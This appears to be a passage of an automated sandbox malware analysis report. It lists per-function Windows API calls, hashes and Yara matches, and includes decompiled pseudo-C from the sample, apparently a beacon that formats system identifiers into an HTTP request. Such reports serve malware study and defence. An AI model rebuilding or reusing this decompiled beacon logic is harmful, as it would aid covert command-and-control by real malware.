                                          • CloseHandle.KERNEL32(?), ref: 00B72250
                                          • CloseHandle.KERNEL32(?), ref: 00B7225C
                                          • CloseHandle.KERNEL32(?), ref: 00B72268
                                          • CloseHandle.KERNEL32(?), ref: 00B72274
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B72283
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                          • String ID:
                                          • API String ID: 2369282788-0
                                          • Opcode ID: a6b0af2f6c4c83abb9dfe23dfa048024f9ebc4e543184c6859b22096e726aaf0
                                          • Instruction ID: e128386774df80de8d9c2c35fd72247174c47e2c859047119413eff392114942
                                          • Opcode Fuzzy Hash: a6b0af2f6c4c83abb9dfe23dfa048024f9ebc4e543184c6859b22096e726aaf0
                                          • Instruction Fuzzy Hash: C6F19471408345AFD710AF68DC85D6BBBE9FB84354F048A6DF5A9A31A0DB31DC84CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6984F Relevance: 42.3, APIs: 28, Instructions: 314synchronizationmemorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B69876
                                          • memcpy.NTDLL(?,?,00000010), ref: 00B69899
                                          • memset.NTDLL ref: 00B698E5
                                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 00B698F9
                                          • GetLastError.KERNEL32 ref: 00B69927
                                          • GetLastError.KERNEL32 ref: 00B6996E
                                          • GetLastError.KERNEL32 ref: 00B6998D
                                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 00B699C7
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B699D5
                                          • GetLastError.KERNEL32 ref: 00B69A4F
                                          • ReleaseMutex.KERNEL32(?), ref: 00B69A61
                                          • RtlExitUserThread.NTDLL(?), ref: 00B69A77
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B69AA0
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B69ABD
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000010), ref: 00B69B0D
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,00000010), ref: 00B69B17
                                          • GetLastError.KERNEL32 ref: 00B69B21
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B69B32
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000010), ref: 00B69B54
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B69B8B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B69B9F
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000010), ref: 00B69BA8
                                          • SuspendThread.KERNEL32(?), ref: 00B69BB7
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000), ref: 00B69BCB
                                          • SetEvent.KERNEL32(00000000), ref: 00B69BD8
                                          • CloseHandle.KERNEL32(00000000), ref: 00B69BDF
                                          • Sleep.KERNEL32(000001F4), ref: 00B69BF2
                                          • ResumeThread.KERNEL32(?), ref: 00B69C16
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CloseFreeHeapObjectSingleThreadWait$CriticalEventHandleSection$CreateDeleteEnterExitFileLeaveMutexOpenReleaseResumeSleepSuspendUserlstrcpynmemcpymemset
                                          • String ID:
                                          • API String ID: 4191902400-0
                                          • Opcode ID: 7ca47df6e489cc1fea727c677c69504907e19196ed54bb66926bd9f0552d5553
                                          • Instruction ID: ce029b47717b25166371115f643b910434a07c5f777297bddcbcff7b8cff6ffb
                                          • Opcode Fuzzy Hash: 7ca47df6e489cc1fea727c677c69504907e19196ed54bb66926bd9f0552d5553
                                          • Instruction Fuzzy Hash: E2B18B72904305EFDB109FA4EC88A6ABBFDFB84311F044969F65AD31A0DB749984CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5AA84 Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B5AAA5
                                          • GetTickCount.KERNEL32 ref: 00B5AABF
                                          • wsprintfA.USER32 ref: 00B5AB12
                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00B5AB1E
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B5AB29
                                          • _aulldiv.NTDLL(?,?,?,?), ref: 00B5AB3F
                                          • wsprintfA.USER32 ref: 00B5AB55
                                          • wsprintfA.USER32 ref: 00B5AB7A
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5AB8D
                                          • wsprintfA.USER32 ref: 00B5ABB1
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5ABC4
                                          • wsprintfA.USER32 ref: 00B5ABFE
                                          • wsprintfA.USER32 ref: 00B5AC22
                                          • lstrcat.KERNEL32(?,?), ref: 00B5AC5A
                                            • Part of subcall function 00B6A670: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,00B5D3E9,?,?), ref: 00B6A730
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B5AC74
                                          • GetTickCount.KERNEL32 ref: 00B5AC84
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5AC98
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5ACB6
                                          • StrTrimA.SHLWAPI(00000000,00B743E8,00000000,0614C310), ref: 00B5ACEF
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5AD11
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5AD18
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5AD1F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5AD26
                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 00B5ADA0
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 00B5ADB2
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0614C310), ref: 00B5ADC1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5ADD3
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5ADE5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
                                          • String ID:
                                          • API String ID: 3322690043-0
                                          • Opcode ID: 49550cc2ce8cb396d0dbea0731ce6a906fd96ed6349612e72fb6e5c3318d7a33
                                          • Instruction ID: e5bf8f77694c2f600ca8afe3f92102d2d609e52f917180c46c22c7eadee3bb43
                                          • Opcode Fuzzy Hash: 49550cc2ce8cb396d0dbea0731ce6a906fd96ed6349612e72fb6e5c3318d7a33
                                          • Instruction Fuzzy Hash: F7A15A71104206AFDB019FA8EC88F5A3BF9FB48302F0549A5F91DD32A0DB31D899DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6D059 Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,?,00B79190), ref: 00B6D0BB
                                          • RtlAllocateHeap.NTDLL(00000000,00B78AA9,?), ref: 00B6D157
                                          • lstrcpyn.KERNEL32(00000000,?,00B78AA9,?,00B79190), ref: 00B6D16C
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B79190), ref: 00B6D187
                                          • StrChrA.SHLWAPI(?,00000020,00B78AA8,?,?,00B79190), ref: 00B6D26E
                                          • StrChrA.SHLWAPI(00000001,00000020,?,00B79190), ref: 00B6D27F
                                          • lstrlen.KERNEL32(00000000,?,00B79190), ref: 00B6D293
                                          • memmove.NTDLL(00B78AA9,?,00000001,?,00B79190), ref: 00B6D2A3
                                          • lstrlen.KERNEL32(?,00B78AA8,?,?,00B79190), ref: 00B6D2CF
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6D2F5
                                          • memcpy.NTDLL(00000000,?,?,?,00B79190), ref: 00B6D309
                                          • memcpy.NTDLL(00B78AA8,?,?,?,00B79190), ref: 00B6D329
                                          • HeapFree.KERNEL32(00000000,00B78AA8,?,?,?,?,?,?,?,?,00B79190), ref: 00B6D365
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B6D42B
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00B6D473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                          • API String ID: 3227826163-647159250
                                          • Opcode ID: 8db828a333d8e0b4f2ae11e3df860382d6d7a3482cfbcf0c9b34c301c2192d60
                                          • Instruction ID: f9152fe52464fef2a81321295cac7852bf554796637f472374574efa91c83f32
                                          • Opcode Fuzzy Hash: 8db828a333d8e0b4f2ae11e3df860382d6d7a3482cfbcf0c9b34c301c2192d60
                                          • Instruction Fuzzy Hash: FBE14771A00205AFDB15DFA8CC88BAE7BB9FF05300F1484A8E919AB261DB34ED51DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5814A Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B5817E
                                          • wsprintfA.USER32 ref: 00B581E8
                                          • wsprintfA.USER32 ref: 00B5822E
                                          • wsprintfA.USER32 ref: 00B5824F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B58286
                                          • wsprintfA.USER32 ref: 00B582A7
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B582C1
                                          • wsprintfA.USER32 ref: 00B582E8
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B582FD
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B58317
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B58338
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B58352
                                            • Part of subcall function 00B5A1EA: lstrlen.KERNEL32(00000000,7477C740,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A215
                                            • Part of subcall function 00B5A1EA: lstrlen.KERNEL32(?,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A21D
                                            • Part of subcall function 00B5A1EA: strcpy.NTDLL ref: 00B5A234
                                            • Part of subcall function 00B5A1EA: lstrcat.KERNEL32(00000000,?), ref: 00B5A23F
                                            • Part of subcall function 00B5A1EA: StrTrimA.SHLWAPI(00000000,=,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A25C
                                          • StrTrimA.SHLWAPI(00000000,00B743E8,00000000,0614C310), ref: 00B58387
                                            • Part of subcall function 00B6E631: lstrlen.KERNEL32(06148560,00000000,00000000,76DC81D0,00B5ACFB,00000000), ref: 00B6E641
                                            • Part of subcall function 00B6E631: lstrlen.KERNEL32(?), ref: 00B6E649
                                            • Part of subcall function 00B6E631: lstrcpy.KERNEL32(00000000,06148560), ref: 00B6E65D
                                            • Part of subcall function 00B6E631: lstrcat.KERNEL32(00000000,?), ref: 00B6E668
                                          • lstrcpy.KERNEL32(?,?), ref: 00B583B0
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B583BA
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B583C5
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B583CC
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B583D7
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B583F3
                                            • Part of subcall function 00B5FEA8: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000), ref: 00B5FEF9
                                            • Part of subcall function 00B5FEA8: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 00B5FF8C
                                          • HeapFree.KERNEL32(00000000,?,00000001,0614C310,?,?,?), ref: 00B584BA
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B584D2
                                          • HeapFree.KERNEL32(00000000,?,00000000,0614C310), ref: 00B584E0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B584EE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B584F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                          • String ID:
                                          • API String ID: 4032678529-0
                                          • Opcode ID: 18b5d30c42e577b9323684521910cb3ec154f88a6a4b6c31c9dfe1c98bc91fc3
                                          • Instruction ID: 684a03a750f60ef952fdf050711aa0f5b7d64856146bc0c648beef81141130bc
                                          • Opcode Fuzzy Hash: 18b5d30c42e577b9323684521910cb3ec154f88a6a4b6c31c9dfe1c98bc91fc3
                                          • Instruction Fuzzy Hash: 3AB17C31504206AFDB019FA8EC84F1A7BE9FB88311F0548A9F94DE72A0DF31D859CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048959E2 Relevance: 34.8, APIs: 23, Instructions: 255memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E048959E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x489a018; // 0x2682f32c
				asm("bswap eax");
				_t65 =  *0x489a014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x489a010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x489a00c; // 0x8f8f86c2
				asm("bswap eax");
				_t68 =  *0x489a348; // 0x9ad5a8
				_t3 = _t68 + 0x489b633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x489a02c,  *0x489a004, _t63);
				_t71 = E04893F1E();
				_t72 =  *0x489a348; // 0x9ad5a8
				_t4 = _t72 + 0x489b673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x489a348; // 0x9ad5a8
					_t8 = _t136 + 0x489b67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139;
				}
				_t76 = E04891567(_t142);
				_t141 = __imp__;
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x489a348; // 0x9ad5a8
					_t11 = _t130 + 0x489b8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x489a2d8, 0, _a8);
				}
				_t77 = E04893268();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x489a348; // 0x9ad5a8
					_t15 = _t125 + 0x489b8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x489a2d8, 0, _a8);
				}
				_t154 =  *0x489a3cc; // 0x52495b0
				_t79 = E04895D1C(0x489a00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					HeapFree( *0x489a2d8, _t160, _a20);
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x489a2d8, 0, 0x800);
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x489a2d8, _t160, _v16);
						goto L28;
					}
					E04893950(GetTickCount());
					_t86 =  *0x489a3cc; // 0x52495b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x489a3cc; // 0x52495b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x489a3cc; // 0x52495b0
					_t156 = E04893739(1, _t151, _a20,  *_t92);
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						HeapFree( *0x489a2d8, _t160, _a8);
						goto L27;
					}
					StrTrimA(_t156, 0x489928c);
					_push(_t156);
					_t98 = E04893970();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x489a2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E04894208( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E04893F62();
						L24:
						HeapFree( *0x489a2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E0489388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_v8 = E04893394(_t165, _a4, _a12, _a16);
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04894C73(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E048943A5(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E04894C73(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}






















































                                          0x048959e2
                                          0x048959e2
                                          0x048959e2
                                          0x048959eb
                                          0x048959f4
                                          0x048959f6
                                          0x048959f6
                                          0x04895a03
                                          0x04895a0e
                                          0x04895a11
                                          0x04895a16
                                          0x04895a1f
                                          0x04895a22
                                          0x04895a27
                                          0x04895a2a
                                          0x04895a2f
                                          0x04895a32
                                          0x04895a3e
                                          0x04895a4b
                                          0x04895a4d
                                          0x04895a53
                                          0x04895a58
                                          0x04895a63
                                          0x04895a65
                                          0x04895a68
                                          0x04895a6e
                                          0x04895a70
                                          0x04895a78
                                          0x04895a83
                                          0x04895a85
                                          0x04895a88
                                          0x04895a88
                                          0x04895a8a
                                          0x04895a8f
                                          0x04895a95
                                          0x04895a9a
                                          0x04895a9d
                                          0x04895aa2
                                          0x04895aaf
                                          0x04895ab1
                                          0x04895ab7
                                          0x04895ac1
                                          0x04895ac1
                                          0x04895ac3
                                          0x04895ac8
                                          0x04895acd
                                          0x04895ad0
                                          0x04895ad5
                                          0x04895ae2
                                          0x04895ae4
                                          0x04895af2
                                          0x04895af2
                                          0x04895af4
                                          0x04895b02
                                          0x04895b07
                                          0x04895b09
                                          0x04895b0e
                                          0x04895ccf
                                          0x04895cd9
                                          0x04895ce2
                                          0x04895b14
                                          0x04895b20
                                          0x04895b26
                                          0x04895b2b
                                          0x04895cc3
                                          0x04895ccd
                                          0x00000000
                                          0x04895ccd
                                          0x04895b37
                                          0x04895b3c
                                          0x04895b45
                                          0x04895b56
                                          0x04895b5a
                                          0x04895b63
                                          0x04895b69
                                          0x04895b78
                                          0x04895b7f
                                          0x04895b88
                                          0x04895b8e
                                          0x04895cb7
                                          0x04895cc1
                                          0x00000000
                                          0x04895cc1
                                          0x04895b9a
                                          0x04895ba0
                                          0x04895ba1
                                          0x04895ba6
                                          0x04895bab
                                          0x04895cad
                                          0x04895cb5
                                          0x00000000
                                          0x04895cb5
                                          0x04895bb4
                                          0x04895bbb
                                          0x04895bc3
                                          0x04895bc8
                                          0x04895bd1
                                          0x04895bdc
                                          0x04895be1
                                          0x04895be6
                                          0x04895ce5
                                          0x04895c99
                                          0x04895c99
                                          0x04895c9e
                                          0x04895ca9
                                          0x04895cab
                                          0x00000000
                                          0x04895cab
                                          0x04895bf0
                                          0x04895bf5
                                          0x04895bfa
                                          0x04895bff
                                          0x04895c0f
                                          0x04895c12
                                          0x04895c18
                                          0x04895c1e
                                          0x04895c24
                                          0x04895c27
                                          0x04895c2d
                                          0x04895c30
                                          0x04895c35
                                          0x04895c39
                                          0x04895c39
                                          0x04895c45
                                          0x04895c51
                                          0x04895c55
                                          0x04895c57
                                          0x04895c5c
                                          0x04895c5e
                                          0x04895c63
                                          0x04895c68
                                          0x04895c75
                                          0x04895c7d
                                          0x04895c80
                                          0x04895c80
                                          0x04895c5c
                                          0x00000000
                                          0x04895c47
                                          0x04895c4b
                                          0x04895c82
                                          0x04895c85
                                          0x04895c8e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04895c8e
                                          0x04895c4d
                                          0x00000000
                                          0x04895c4d
                                          0x04895c45

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 048959F6
                                          • wsprintfA.USER32 ref: 04895A46
                                          • wsprintfA.USER32 ref: 04895A63
                                          • wsprintfA.USER32 ref: 04895A83
                                          • wsprintfA.USER32 ref: 04895AAF
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895AC1
                                          • wsprintfA.USER32 ref: 04895AE2
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895AF2
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04895B20
                                          • GetTickCount.KERNEL32 ref: 04895B31
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 04895B45
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 04895B63
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04893739: strcpy.NTDLL ref: 04893783
                                            • Part of subcall function 04893739: lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 04893739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
                                          • StrTrimA.SHLWAPI(00000000,0489928C,?,052495B0), ref: 04895B9A
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04893970: lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                            • Part of subcall function 04893970: lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04895BBB
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04895BC3
                                          • lstrcat.KERNEL32(00000000,?), ref: 04895BD1
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04895BD7
                                            • Part of subcall function 04894208: lstrlen.KERNEL32(?,00000000,05249DA0,00000000,04892263,05249FC3,69B25F44,?,?,?,?,69B25F44,00000005,0489A00C,4D283A53,?), ref: 0489420F
                                            • Part of subcall function 04894208: mbstowcs.NTDLL ref: 04894238
                                            • Part of subcall function 04894208: memset.NTDLL ref: 0489424A
                                          • wcstombs.NTDLL ref: 04895C68
                                            • Part of subcall function 04893394: SysAllocString.OLEAUT32(?), ref: 048933CF
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 04895CA9
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04895CB5
                                          • HeapFree.KERNEL32(00000000,00000000,?,052495B0), ref: 04895CC1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895CCD
                                          • HeapFree.KERNEL32(00000000,?), ref: 04895CD9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 2543559236-0
                                          • Opcode ID: cc5fd97868907c81e74bde6966637694d16d91dbcb5c75fe30b949ca605f355f
                                          • Instruction ID: f4ece27fa88d5d4000d4bc8324a0a0094575d7bc98dae11ab4751ecba365cb66
                                          • Opcode Fuzzy Hash: cc5fd97868907c81e74bde6966637694d16d91dbcb5c75fe30b949ca605f355f
                                          • Instruction Fuzzy Hash: 97913871600A09FFDF16AFA8DC88A9A3BF9EB48314B184914F805D7220DB79ED51DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B626B5 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32 ref: 00B626D1
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B626ED
                                          • GetLastError.KERNEL32 ref: 00B6273C
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B62752
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B62766
                                          • GetLastError.KERNEL32 ref: 00B62780
                                          • GetLastError.KERNEL32 ref: 00B627B3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B627D1
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B627FD
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B62812
                                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 00B628E6
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B628F5
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B6290A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6291D
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6292F
                                          • RtlExitUserThread.NTDLL(?,?), ref: 00B62944
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                          • String ID:
                                          • API String ID: 3853681310-3916222277
